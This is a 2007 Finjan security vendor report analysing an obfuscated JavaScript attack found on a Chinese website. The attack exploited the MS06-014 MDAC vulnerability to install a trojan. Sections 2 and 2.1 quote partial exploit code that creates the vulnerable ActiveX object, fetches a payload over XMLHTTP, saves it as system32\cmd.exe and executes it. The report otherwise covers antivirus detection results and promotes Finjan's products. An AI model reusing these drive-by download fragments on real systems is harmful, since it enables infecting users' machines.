Finjan Malicious Code Research Center. Malicious Page of the Month

Transcription

1 Finjan Malicious Code Research Center Malicious Page of the Month August 2007

2 Copyright Finjan Software Inc. and its affiliates and subsidiaries ( Finjan ). All rights reserved. All text and figures included in this publication are the exclusive property of Finjan and are for your personal and non-commercial use. You may not modify, copy, distribute, transmit, display, perform, reproduce, publish, license, create derivative works from, transfer, use or sell any part of its content in any way without the express permission in writing from Finjan. Information in this document is subject to change without notice and does not present a commitment or representation on the part of Finjan. The Finjan technology and/or products and/or software described and/or referenced to in this material are protected by registered and/or pending patents including U.S. Patents No , , , , , , , , , , , , , , , , and may be protected by other U.S. Patents, foreign patents, or pending applications. Finjan, Finjan logo, Vital Security, Vulnerability Anti.dote and Window-of-Vulnerability are trademarks or registered trademarks of Finjan. Sophos is a registered trademark of Sophos plc. McAfee is a registered trademark of McAfee Inc. Kaspersky is a registered trademark of Kaspersky Lab. SurfControl is a registered trademark of SurfControl plc. Microsoft and Microsoft Office are registered trademarks of Microsoft Corporation. All other trademarks are the trademarks of their respective owners. For additional information, please visit or contact one of our regional offices: USA 2025 Gateway Place Suite 180 San Jose, CA 95110, USA Toll Free: FINJAN 8 Tel: Fax: salesna@finjan.com Chrysler Building 405 Lexington Avenue, 35th Floor New York, NY 10174, USA Tel: Fax: salesna@finjan.com Israel/APAC Hamachshev St. 1, New Industrial Area Netanya, Israel Tel: +972 (0) Fax: +972 (0) salesint@finjan.com Europe Westmead House, Westmead, Farnborough, GU14 7LP, UK Tel: +44 (0) Fax: +44 (0) salesuk@finjan.com Alte Landstrasse 27, Ottobrun, Germany Tel: +49 (0) Fax: +49 (0) salesce@finjan.com Printerweg AD Amersfoort The Netherlands Tel: +31 (0) Fax: +31 (0) salesne@finjan.com info@finjan.com Internet: August 2007 i

3 Table of Contents 1 Introduction The Growing Ease of Malicious Code Propagation Obfuscated Code Revisited Using Legitimate Tools to Create Malicious Code Do Other Web Security Products Block This Malicious Code? Conclusion About MCRC About Finjan August 2007 ii

4 1 Introduction This analysis is geared towards helping our customers understand how current threats are created and the methodologies used by malware writers to heighten the infection rate and evade conventional security measures. Finjan s findings over the past months indicate that the use of code obfuscation is no longer considered a special technique, or it is a new trend in the web security field. Code obfuscation has become the de facto standard for malicious code propagation, so much so that coming across malicious code that is not obfuscated in some form is a rare occurrence. The obfuscation method is usually generated by one of the latest versions of the current toolkits, which are being sold on the Internet. For additional information on malicious toolkits for sale, please review the MPOM May For additional information on the evolution of code obfuscation in the web security field, please visit Finjan s Security Center. 1.1 The Growing Ease of Malicious Code Propagation Due to the rapid growth in the availability of malicious code on the web, security vendors are facing an uphill battle. Creating signatures for each and every exploit of the various toolkits is obviously an exhausting process. Nor are signature-based methods particularly effective, as the dynamic nature of the code obfuscation renders signaturing the underlying code almost impossible. While trying to keep pace with the new vulnerabilities and new security threats, security vendors also need to monitor the available toolkits and their various versions. Each toolkit usually provides several different exploits which can be updated and changed every day, if not every hour. Code obfuscation as a technique wasn't originally developed for spreading malicious content on the web, but rather was used for legitimate purposes. It can be easily generated by automated utilities. Such utilities are available on the web (some of them for free), and are very easy to use, especially by the crimeware authors. For additional information on Legitimate Obfuscation Utilities, please visit MCRC Blog post. This edition of the Malicious Page of the Month focuses on a successful exploitation using one of these utilities which was discovered in the wild. The malicious code was found on a high-traffic website, thus providing proof of concept for a widespread problem in the web security arena. August

5 2 Obfuscated Code Revisited Following is an example of a Chinese website being used for spreading malicious content. One of the URLs in the site contains malicious code which eventually results in the download and execution of a piece of crimeware on the victim machine. Figure 1 shows the growth in the site s traffic during July once the malicious content had been uploaded. Figure 1 Traffic rate of malicious site once a malicious content has been uploaded One of the malicious URLs is responsible for the installation of malicious ANI spoofed file, two iframes and one script on the end-user PC (see Figure 2). Each one points to a well written exploit of known vulnerabilities. Figure 2 Malicious URL found on the site contains malicious code Let s take a deeper look at the malicious JavaScript file which is being downloaded each time a user visits the above URL. The malicious file contains a sophisticated JavaScript code, nevertheless, just like a standard obfuscated code, a custom decryption function is used for dynamically executing the malicious code. Later we will show that this sophisticated script was generated August

6 through a free utility, developed by a JavaScript expert, and most likely not for malicious purposes. Figure 3 Obfuscated malicious JavaScript generated from a legitimate and free obfuscation utility It should be noted that the obfuscation technique used here is much more advanced from a technical standpoint than examples previously encountered in the wild, further raising the bar for security vendors. Full code analysis of the above script is available at MCRC Blog post. When decrypting the obfuscated code shown in Figure 3, a well known and very common exploit was exposed. This exploit uses the Microsoft Data Access Components Vulnerability (MS06-014). Its severity is categorized as highly critical, as it can result in remote code execution on the victim machine. Successful exploitation will result in downloading and running a crimeware Trojan on the victim machine. Following is a brief description of the attack. Step 1: Creating the vulnerable object: var qbicl3=window["document"]["createelement"]("object"); qbicl3["setattribute"]("classid","clsid:bd96c556-65a3-[removed]- 00C04FC29E36"); August

7 Step 2: Requesting the crimeware Trojan using AJAX technology. Saving it under the Windows\System32 folder on the victim machine, naming it cmd.exe and then executing it by using the Shell.Application object. try { dl=' var[removed]l3["createobject"]("microsoft.x"+"m"+"l"+"h"+"t"+"t"+"p","");var[removed]j7=hiymfh6["getspecialfolder"](0)[removed]n4["respon sebody"]); _5["SaveToFile"](fname1,2); [REMOVED]BuildPath"](j7+'\\system32','cmd.exe'); OWSDdEfq_8["ShellExecute"] 2.1 Using Legitimate Tools to Create Malicious Code The obfuscation technique and utility used in this case might lead one to believe that this looks like a case of legitimate code obfuscation, which by chance was not being signatured by security vendors. However, this is not a single instance. In addition to this example, Finjan s MCRC researchers have encountered several cases where malicious code is being obfuscated in the same way. The same obfuscation tool shown in the example above was also used for creating additional malicious content, which has been recently seen in the wild. And the same scenario presides once the malicious code is decrypted, several security vendors are able to detect the known exploits. However as long as the code is obfuscated, the malicious code bypasses these vendors products and users are exposed to well known security threats. So why not take some of the known exploits, obfuscate them using one or more of the free tools available on the web until one of them bypasses the most popular security applications, and load it up to the Internet? Crimeware authors can even use free online tools to test their code against a variety of security products before releasing them, in order to verify their ability to avoid detection. Unfortunately, it would appear that it is just a question of time until this very scenario takes place (all the tools are available for free). As this report shows, without the ability to understand what the obfuscated code tries to do behind the scenes, it becomes very hard to detect whether the code is malicious or not. Many signature-based products can identify the obfuscation function itself and have even created signatures for such instances. Now that hackers are using legitimate obfuscation utilities to mask malicious code, these scenarios cannot be blocked across the board by signature-based solutions, without the risk of introducing a major false positive problem. August

8 2.2 Do Other Web Security Products Block This Malicious Code? We posted the malicious file on in order to see how security solutions handle this sophisticated, yet easy to generate malicious file. Virustotal.com runs the code against 32 leading security products (see Figure 4) in a non-benchmark methodology, so using this online service is just a reference sample. According to the virustotal report, none of these security products detected the obfuscated JavaScript file, containing malicious code. Figure 4 Virus Total scanning report on the obfuscated malicious script (July 31, 2007) August

9 A second posting to Virustotal.com of the decrypted malicious file indicates that only 2 of the 32 security vendors were able to detect the decrypted malicious code. Figure 5 Virus Total scanning report on the encrypted malicious file August

10 3 Conclusion The way to detect modern malicious code is to be able to understand what the code intends to do, before it does it. As website content is becoming more volatile, and domain names can be set up for brief periods of time, the task of keeping track of the malicious content on the WWW is becoming ever more difficult. Attempts to pattern malicious code and create signatures, or to categorize known malicious sites, are clearly insufficient when it comes to providing adequate protection to today s dynamic web threats. As virtually all modern attacks use code obfuscation and other anti-forensic methods, security companies find it more difficult to put their hands on malicious code, analyze it in their labs and create a signature for it. Anti-virus, reputation-based services and URL filtering solutions are potentially limited in their ability to cope with attacks that make use of constantly changing malicious code. The only way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyze and understand the code embedded within web content on-the-fly before it reaches the end users. Finjan detects and blocks malicious code that uses obfuscation and other types of antiforensic techniques. The figures below illustrate Finjan s detection of the malicious code presented in this report. Utilizing real-time content inspection technology, Finjan achieves the highest rate of malicious code detection and prevention, by analyzing each and every piece of web content in real-time, regardless of its original source. This is the preferred approach for identifying the true intent of the code that enables blocking it before it executes on the end user machine. Figure 6 Finjan Vital Security blocks access to the infected Chinese site August

11 Figure 7 Vital Security detailed scanning report on the obfuscated malicious file August

12 Figure 8 Vital Security scanning report on the decrypted malicious file 4 About MCRC Malicious Code Research Center (MCRC) is the leading research department at Finjan, dedicated to the research and detection of security vulnerabilities in Internet and applications as well as other popular applications. MCRC s goal is to continue to be steps ahead of hackers attempting to exploit open platforms and technologies to develop malicious code such as Spyware, Trojans, Phishing attacks, worm and viruses. MCRC researchers work with the world s leading software vendors to help patch their security holes, as well as contribute to the development of next generation defense tools for Finjan s proactive secure content management solutions. For more information, visit our MCRC subsite. August

13 5 About Finjan Finjan is a global provider of secure web gateway solutions for the enterprise market. Our real-time, appliance-based web security solutions deliver the most effective shield against web-borne threats, freeing enterprises to harness the web for maximum commercial results. Finjan s real-time web security solutions utilize patented behaviorbased technology to repel all types of crimeware threats arriving via the web, such as spyware, phishing, Trojans, obfuscated code and other malicious code, securing businesses against unknown and emerging threats, as well as known malware. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including IDC, Butler Group, SC Magazine, eweek, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan s award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential. For more information about Finjan, please visit August